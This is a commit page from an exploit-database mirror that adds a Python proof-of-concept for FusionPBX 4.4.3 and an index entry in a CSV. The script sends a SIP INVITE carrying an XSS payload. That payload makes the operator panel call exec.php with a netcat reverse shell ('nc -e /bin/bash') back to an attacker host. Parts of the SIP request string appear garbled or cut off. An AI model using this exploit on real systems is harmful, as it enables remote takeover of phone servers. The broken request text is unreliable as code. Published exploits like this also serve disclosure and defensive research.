bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2019-06-13

Browse source 
1 changes to exploits/shellcodes

FusionPBX 4.4.3 - Remote Command Execution
This commit is contained in:
Offensive Security 2019-06-13 05:01:52 +00:00
parent 29aeb0c030
commit 698fffff86
2 changed files with 86 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

85
exploits/php/webapps/46985.py Executable file
View file

@ -0,0 +1,85 @@
# Exploit Title: FusionPBX <= 4.4.3 Command Injection RCE via XSS
# Date: 06-11-2019
# Exploit Author: Dustin Cobb
# Vendor Homepage: https://www.fusionpbx.com
# Software Link: https://https://github.com/fusionpbx/fusionpbx
# Version: <= 4.4.3
# Tested on: Debian 8.11
# CVE : CVE-2019-11408 (XSS) AND CVE-2019-11409 (Command Injection RCE)
#!/usr/bin/python
import socket, sys
from random import randint
from hashlib import md5
# Exploitation steps:
#
# 1. First, encode an XSS payload that will be injected into the
# “Caller ID Number” field, or “User” component of the SIP
# “From” URI.
# 2. Connect to external SIP profile port and send a SIP INVITE
# packet with XSS payload injected into the From Field.
# 3. XSS payload will fire operator panel screen (CVE-2019-11408), which
# is designed to be monitored constantly by a call center operator.
# 4. Once XSS code executes, a call is made to the exec.php script
# (CVE-2019-11409) with a reverse shell payload that connects back to
# a netcat listener on the attacker system.
# edit these variables to set up attack
victim_addr="10.10.10.10"
victim_host="victim-pbx1.example.com"
victim_num="12125551212"
attacker_ip="10.10.10.20"
attacker_port=4444
def encode(val):
ret=""
for c in val:
ret+="\\x%02x" % ord(c)
return ret
callid=md5(str(randint(0,99999999))).hexdigest()
cmd="nc -e /bin/bash %s %d" % (attacker_ip, attacker_port)
payload="q=new XMLHttpRequest();q.open('GET','exec.php?cmd=system %s',true);q.send();" % cmd
xss=";tag=%s
To:
Call-ID: %s
CSeq: 1 INVITE
Contact:
Max-Forwards: 70
User-Agent: Exploit POC
Content-Type: application/sdp
Allow: INVITE, ACK, OPTIONS, CANCEL, BYE, SUBSCRIBE, NOTIFY, INFO, REFER, UPDATE, MESSAGE
Content-Length: 209
v=0
o=root 1204310316 1204310316 IN IP4 127.0.0.1
s=Media Gateway
c=IN IP4 127.0.0.1
t=0 0
m=audio 4446 RTP/AVP 0 101
a=rtpmap:0 PCMU/8000
a=rtpmap:101 telephone-event/8000
a=fmtp:101 0-16
a=ptime:2
a=sendrecv""" % (victim_num, victim_host, xss, callid, victim_num, victim_host, callid)
payload=payload.replace("\n","\r\n")
s=socket.socket()
s.connect((victim_addr,5080))
print payload
print
s.send(payload)
data=s.recv(8192)
print data

1
files_exploits.csv
View file

@ -41391,3 +41391,4 @@ id,file,description,date,author,type,platform,port
46981,exploits/php/webapps/46981.txt,"WordPress Plugin Insert or Embed Articulate Content into WordPress - Remote Code Execution",2019-06-11,xulchibalraa,webapps,php,80
46982,exploits/php/webapps/46982.txt,"phpMyAdmin 4.8 - Cross-Site Request Forgery",2019-06-11,Riemann,webapps,php,
46983,exploits/jsp/webapps/46983.txt,"Liferay Portal 7.1 CE GA=3 / SimpleCaptcha API - Cross-Site Scripting",2019-06-11,"Valerio Brussani",webapps,jsp,
46985,exploits/php/webapps/46985.py,"FusionPBX 4.4.3 - Remote Command Execution",2019-06-12,"Dustin Cobb",webapps,php,

Can't render this file because it is too large.